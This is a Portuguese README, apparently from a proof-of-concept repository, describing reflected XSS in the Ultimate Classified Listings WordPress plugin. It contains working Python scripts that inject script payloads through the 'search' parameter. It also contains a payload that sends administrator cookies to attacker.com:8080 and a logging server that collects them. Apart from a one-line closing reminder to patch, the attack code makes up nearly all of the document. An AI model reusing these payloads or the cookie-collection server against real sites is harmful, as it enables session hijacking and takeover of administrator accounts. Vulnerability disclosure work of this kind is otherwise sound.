
Scripts de prova de conceito demonstrando XSS refletido no plugin Ultimate Classified Listings para WordPress e roubo de cookies de administrador por meio de payloads elaborados e um servidor de registro.
Este repositório contém scripts de Prova de Conceito (PoC) para várias vulnerabilidades descobertas em diferentes plugins WordPress. Estes scripts demonstram como atacantes podem explorar essas vulnerabilidades para realizar ações maliciosas.
Cross-Site Scripting (XSS) Refletido no Plugin Ultimate Classified Listings
Roubo de Cookies Usando XSS
Esta PoC demonstra como explorar a vulnerabilidade de XSS refletido no plugin Ultimate Classified Listings.
Identifique o Parâmetro Vulnerável:
search na URL http://example.com/classifieds.Crie uma URL Maliciosa:
http://example.com/classifieds?search=<script>alert('XSS')</script>
Execute o Script da PoC:
xss_poc.py e execute-o.import requests
# Configuration
target_url = "http://example.com/classifieds" # Change this to the target site's URL
payload = "<script>alert('XSS')</script>" # XSS payload
def trigger_xss():
# Construct the malicious URL
malicious_url = f"{target_url}?search={payload}"
# Send a GET request to the malicious URL
response = requests.get(malicious_url)
# Check if the payload is reflected in the response
if payload in response.text:
print("[+] XSS payload reflected in the response.")
print("[+] Malicious URL:", malicious_url)
else:
print("[-] XSS payload not reflected in the response.")
if __name__ == "__main__":
trigger_xss()
Esta PoC demonstra como um atacante pode explorar a vulnerabilidade de XSS refletido para roubar cookies de usuários com altos privilégios.
Configure um Servidor Malicioso:
malicious_server.py e execute-o para iniciar um servidor que registra requisições recebidas (incluindo cookies).from http.server import BaseHTTPRequestHandler, HTTPServer
import logging
class RequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
logging.info(f"Received request: {self.headers}")
self.send_response(200)
self.end_headers()
def run(server_class=HTTPServer, handler_class=RequestHandler, port=8080):
logging.basicConfig(filename='server.log', level=logging.INFO)
server_address = ('', port)
httpd = server_class(server_address, handler_class)
logging.info(f'Starting server on port {port}...')
httpd.serve_forever()
if __name__ == "__main__":
run()
Crie um Payload para Roubar Cookies:
http://example.com/classifieds?search=<script>new Image().src='http://attacker.com:8080?cookie='+document.cookie;</script>
Execute o Script da PoC:
steal_cookies_poc.py e execute-o.import requests
# Configuration
target_url = "http://example.com/classifieds" # Change this to the target site's URL
attacker_server = "http://attacker.com:8080" # Change this to your malicious server's URL
payload = f"<script>new Image().src='{attacker_server}?cookie='+document.cookie;</script>"
def trigger_xss():
# Construct the malicious URL
malicious_url = f"{target_url}?search={payload}"
# Send a GET request to the malicious URL
response = requests.get(malicious_url)
# Check if the payload is reflected in the response
if payload in response.text:
print("[+] XSS payload reflected in the response.")
print("[+] Malicious URL:", malicious_url)
else:
print("[-] XSS payload not reflected in the response.")
if __name__ == "__main__":
trigger_xss()
Estas PoCs demonstram como um atacante poderia explorar vulnerabilidades em plugins WordPress para realizar ações maliciosas. Mantenha sempre seu software atualizado e siga as melhores práticas de segurança para prevenir tais vulnerabilidades.